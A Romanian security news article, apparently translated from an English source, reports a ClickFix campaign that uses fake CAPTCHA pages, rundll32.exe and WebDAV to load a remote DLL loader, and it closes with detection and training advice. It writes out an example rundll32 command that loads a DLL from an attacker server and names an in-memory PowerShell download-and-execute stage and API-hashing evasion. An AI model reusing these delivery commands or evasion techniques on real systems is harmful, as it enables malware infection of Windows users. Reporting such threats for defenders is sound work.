Noua variantă ClickFix folosește Rundll32 și WebDAV
Sursă: https://cybersecuritynews.com
A fost detectată o versiune nouă și mai periculoasă a tehnicii de atac ClickFix, care vizează în mod activ utilizatorii de Windows. Spre deosebire de versiunile anterioare, care foloseau PowerShell sau mshta pentru a rula comenzi rău intenționate, această nouă variantă adoptă o abordare diferită.
Aceasta utilizează rundll32.exe și WebDAV, două componente integrate în Windows, pentru a furniza și executa în secret payload-uri fără a declanșa cele mai comune alerte de securitate.
Această schimbare face ca atacul să fie mai greu de detectat, în special pentru organizațiile ale căror sisteme de securitate se concentrează în principal pe detectarea amenințărilor bazate pe scripturi.
Atacurile ClickFix sunt cunoscute pentru faptul că îi determină pe utilizatori să execute comenzi rău intenționate pe propriile computere. În acest caz, atacatorul creează un site web fals, conceput ca o pagină de verificare CAPTCHA.
Specialiștii au identificat această nouă variantă a ClickFix în cadrul monitorizării active a amenințărilor, observând că aceasta reduce semnificativ dependența de motoarele de scripting supravegheate în mod obișnuit.
În loc să apeleze direct la PowerShell la început, atacul utilizează rundll32.exe împreună cu mini-redirectorul WebDAV, ceea ce permite sistemului Windows să acceseze fișiere la distanță prin HTTP, ca și cum acestea ar fi stocate pe o partajare de rețea locală
Aceasta înseamnă că fișierul DLL rău intenționat este descărcat de pe un server controlat de atacator folosind o comandă de genul rundll32.exe \server@80\verification.google,#1, unde #1 se referă la o funcție de export care utilizează un număr ordinal în loc de un nume ușor de citit, adăugând astfel un alt nivel de ascundere.
Impactul acestei abordări este semnificativ. Echipele de securitate care își concentrează regulile de detectare pe PowerShell, mshta sau motoare de scripting similare pot omite complet etapele incipiente ale acestui atac.
Malware-ul se integrează în activitatea normală a Windows, deoarece rundll32.exe este un instrument de sistem de încredere utilizat zilnic de aplicații legitime.
Ceea ce face ca această variantă ClickFix să fie deosebit de complicată este modul în care gestionează totul după executarea primei comenzi. Odată ce rundll32.exe preia și încarcă DLL-ul de la distanță prin WebDAV, infectarea trece într-un proces în mai multe etape care se desfășoară aproape în întregime în memorie.
Atacul trece la PowerShell într-o etapă ulterioară, folosind Invoke-Expression (IEX) împreună cu Net.WebClient.DownloadString pentru a extrage și rula payload-uri fără a scrie fișiere pe disk.
Payload-ul principal implicat în acest atac este un loader secundar numit SkimokKeep. Acesta este distribuit sub forma unei biblioteci DLL Windows pe 32 de biți, denumită verification.google, și utilizează mai multe metode avansate pentru a evita detectarea.
În loc să importe funcțiile API Windows în mod obișnuit, acesta parcurge Process Environment Block (PEB) pentru a identifica modulele de sistem încărcate și determină adresele funcțiilor folosind un algoritm de hash de tip DJB2
Această abordare ascunde funcțiile de sistem pe care malware-ul le folosește de fapt, făcând analiza statică mult mai dificilă.
În plus, echipelor de securitate li se recomandă insistent să monitorizeze toate executările rundll32.exe care includ argumentele davclnt.dll și DavSetCookie, întrucât acesta este un indicator clar al transmiterii de payload prin WebDAV.
În plus, organizațiile ar trebui să îmbunătățească instruirea de conștientizare a utilizatorilor, axată în mod specific pe paginile CAPTCHA false și atacurile de inginerie socială de tip ClickFix, deoarece succesul acestei campanii depinde în întregime de faptul că utilizatorul urmează instrucțiunile de pe ecran.
Sursă: https://cybersecuritynews.com/new-clickfix-variant-uses-rundll32/
